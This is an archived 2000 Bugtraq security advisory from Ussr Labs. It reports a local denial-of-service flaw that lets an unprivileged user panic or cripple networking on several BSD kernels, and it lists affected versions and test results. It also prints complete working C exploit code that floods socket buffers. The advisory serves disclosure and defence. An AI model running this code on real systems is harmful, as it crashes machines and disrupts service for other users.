Date: Wed, 2 Aug 2000 08:41:53 -0300 From: Ussr Labs <labs@USSRBACK.COM> To: BUGTRAQ@SECURITYFOCUS.COM Subject: Local FreeBSD, Openbsd, NetBSD, DoS Vulnerability - Mac OS X affected Message-ID: <NCBBKFKDOLAGKIAPMILPCEJLCEAA.labs@ussrback.com>
next in thread | raw e-mail | index | archive | help
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Local FreeBSD, Openbsd, NetBSD, DoS Vulnerability
Release Date:
April 29, 2000
Systems Affected:
FreeBSD 3.3-RELEASE
FreeBSD 4.0-RELEASE
FreeBSD 5.0 (maybe)
Openbsd 2.5
Openbsd 2.6
Openbsd 2.7 (maybe)
NetBSD 1.4.1
THE PROBLEM
- From an original posting made about last September by Sven Berkenvs
(sven@ILSE.NL) to bugtraq:
- --- Forward ---
I stumbled across a denial of service attack on FreeBSD systems,
where
an unpriviledged user can panic the kernel. Quick and dirty testing
(code attached at the end of this mail) showed OpenBSD is vulnerable
too:
FreeBSD - 3.2-RELEASE: the kernel panics. I haven't had a chance to
test it on older FreeBSD versions.
OpenBSD 2.4 - GENERIC kernel & OpenBSD 2.5-current with
NMBSCLUSTERS=8192:
The kernel logs one "/bsd: mb_map full" and all processes trying to
send
something over the network get stuck waiting in mbuf. Locally the
system
continues to function. Tested by a friend.
NetBSD: Not available, but it is highly probable that the affected
code
in OpenBSD is from its parent NetBSD.
- --- End of Forward ---
Upon testing this code on the new versions of *bsd the exploit still
works.
FreeBSD - 3.3-RELEASE: reboots the pc
FreeBSD - 4.0-RELEASE and 4.0-STABLE as of May 25, 2000: in the logs
recieves /kernel: xl0: no memory for rx list -- packet dropped!
All network connection is dead and the route table is a mess.
FreeBSD - 5.0-Current: Untested
Openbsd - 2.5 (with NMBCLUSTERS=8192): mb_map full
Openbsd - 2.6 (with patches up to May 25, 2000): mb_map full
Openbsd - 2.7: Untested
NetBSD - 1.4.1: /netbsd: WARNING: mclpool limit reached; increase
NMBCLUS
The network connection is dead.
NetBSD - 1.4.2: Untested
- From what I have tested on, Linux does not have any issue with
this piece of code. As for the other unices, they have not been
tested.
THE CODE
The original code written by Sven Berkenvs that causes this:
#include <unistd.h>
#include <sys/socket.h>
#include <fcntl.h>
#define BUFFERSIZE 204800
extern int
main(void)
{
int p[2], i;
char crap[BUFFERSIZE];
while (1)
{
if (socketpair(AF_UNIX, SOCK_STREAM, 0, p) == -1)
break;
i = BUFFERSIZE;
setsockopt(p[0], SOL_SOCKET, SO_RCVBUF, &i,
sizeof(int));
setsockopt(p[0], SOL_SOCKET, SO_SNDBUF, &i,
sizeof(int));
setsockopt(p[1], SOL_SOCKET, SO_RCVBUF, &i,
sizeof(int));
setsockopt(p[1], SOL_SOCKET, SO_SNDBUF, &i,
sizeof(int));
fcntl(p[0], F_SETFL, O_NONBLOCK);
fcntl(p[1], F_SETFL, O_NONBLOCK);
write(p[0], crap, BUFFERSIZE);
write(p[1], crap, BUFFERSIZE);
}
exit(0);
}
Underground Security Systems Research
http://www.ussrback.com
Greetings:
Eeye, Attrition, w00w00, beavuh, Rhino9, SecurityFocus.com, ADM, HNN,
Sub, prizm, b0f,Technotronic and Rfp.
Disclaimer:
The information within this paper may change without notice. Use of
this information constitutes acceptance for use in an AS IS
condition. There are NO warranties with regard to this information.
In no event shall the author be liable for any damages whatsoever
arising out of or in connection with the use or spread of this
information. Any use of this information is at the user's own risk.
Feedback:
Please send suggestions, updates, and comments to:
Underground Security Systems Research
mail:labs@ussrback.com
http://www.ussrback.com
-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 6.5.2 for non-commercial use <http://www.pgp.com>;
iQA/AwUBOYgJAK3JcbWNj6DDEQJNMQCgzvEMALCmfNJ9EpPVF1uRNFiniC8AoKsV
ucQIKYXTFMT6TzTx3JNHVw0L
=LDeL
-----END PGP SIGNATURE-----
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi? <NCBBKFKDOLAGKIAPMILPCEJLCEAA.labs>